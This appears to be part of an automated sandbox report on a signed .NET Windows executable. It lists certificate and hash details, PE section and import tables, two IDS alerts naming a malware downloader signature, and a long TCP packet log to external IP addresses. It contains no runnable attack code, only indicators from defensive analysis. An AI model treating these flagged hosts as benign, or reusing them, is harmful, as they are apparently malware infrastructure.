                                                                                                                                • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                                                                Version:3
                                                                                                                                Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                                                                Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                                                                                                Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                                                                                                Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x439400x4b.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x10e28.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x52e000x1de0.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x560000xc.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x20000x419940x41a000606c138e96f2e286707953ef42f7514False0.39374627976190474data5.6884083135074555IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x440000x10e280x11000f610e0855d271b56b7174997eb33bf0bFalse0.055893841911764705data4.109331107170668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x560000xc0x200ab05ac80ea86483c92145fda205f7dc6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0x441300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.046492369572932686
                                                                                                                                RT_GROUP_ICON0x549580x14data1.15
                                                                                                                                RT_VERSION0x5496c0x308data0.4497422680412371
                                                                                                                                RT_MANIFEST0x54c740x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385
                                                                                                                                DLLImport
                                                                                                                                mscoree.dll_CorExeMain
                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-03T15:20:35.641728+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549716132.226.247.7380TCP
                                                                                                                                2024-12-03T15:21:00.094889+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549774132.226.247.7380TCP
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 3, 2024 15:20:12.503041983 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:12.503082037 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:12.503165007 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:12.516357899 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:12.516371965 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:14.689219952 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:14.689304113 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:14.696672916 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:14.696687937 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:14.696947098 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:14.746893883 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:14.787349939 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.633193970 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.633220911 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.633286953 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.633307934 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.633362055 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.641087055 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.641155958 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.657857895 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.657963991 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.822807074 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.822887897 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.838557005 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.838651896 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.854799986 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.854881048 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.863385916 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.863454103 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.880315065 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.880377054 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.880394936 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.880445957 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.897176981 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.897253990 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:15.913853884 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:15.913944960 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.019742966 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.019821882 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.028551102 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.028640985 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.040050983 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.040142059 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.052337885 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.052409887 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.058674097 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.058743954 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.071223021 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.071300030 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.084326029 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.084398031 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.090825081 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.090893984 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.102842093 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.102922916 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.102943897 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.102986097 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.115269899 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.115345001 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.127726078 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.127784014 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.134218931 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.134282112 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.203325987 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.203422070 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.209702015 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.209781885 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.215919018 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.215997934 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.224164009 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.224222898 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.244790077 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244800091 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244834900 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244903088 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.244925022 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244940996 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.252259970 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.252334118 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.252351999 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.252393007 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.255939007 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.256015062 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.262865067 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.262945890 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.269902945 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.269969940 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.272437096 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.272496939 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.277029037 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.277095079 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.280407906 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.280467987 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.282610893 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.282669067 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.286933899 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.286995888 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.290937901 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.291007042 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.293127060 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.293193102 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.297311068 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.297375917 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.299623966 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.299690008 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.324659109 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.324744940 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.404499054 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.404613972 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.405711889 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.405782938 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.410043955 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.410130024 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.412535906 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.412597895 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.414467096 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.414544106 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.418045044 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.418098927 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.422153950 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.422216892 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.423965931 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.424017906 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.427155018 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.427218914 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.428879023 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.428946972 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.438254118 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.438328981 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.440527916 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.440586090 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.443381071 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.443463087 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.445951939 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.446011066 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.448990107 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.449064016 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.450217962 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.450288057 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.451924086 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.451997042 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.455724001 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.455785036 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.456733942 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.456789017 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.458110094 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.458199978 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.460490942 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.460557938 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.462934017 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.462985039 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.464441061 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.464519978 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.470503092 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.470551968 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.470577955 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.470591068 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.470606089 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.472856045 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.472969055 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.472978115 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.473026991 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.475249052 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.475317955 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.476408958 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.476479053 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.552845955 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.552970886 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.554409027 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.554471970 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.556401014 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.556468964 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.558980942 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.559055090 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.606909990 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.607074022 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.607562065 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.607626915 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.612775087 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.612857103 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.614037037 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.614098072 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.615391016 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.615466118 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.617305994 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.617367029 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.624408960 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.624486923 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.625893116 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.625957012 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.639941931 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.640012026 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.641609907 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.641712904 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.643222094 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.643299103 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.783849001 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.783936024 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.785671949 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.785737991 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.788121939 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.788180113 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.790307999 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.790366888 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.792473078 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.792574883 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.793457031 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.793520927 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.795540094 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.795598030 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.797379017 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.797436953 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.798537016 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.798597097 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.800401926 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.800461054 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.806915045 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.806969881 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.942248106 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.942400932 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.944199085 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.944261074 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.946358919 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.946425915 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.947623014 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.947678089 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.949686050 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.949743986 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.951854944 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.951919079 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.953365088 CET44349713194.15.112.248192.168.2.5
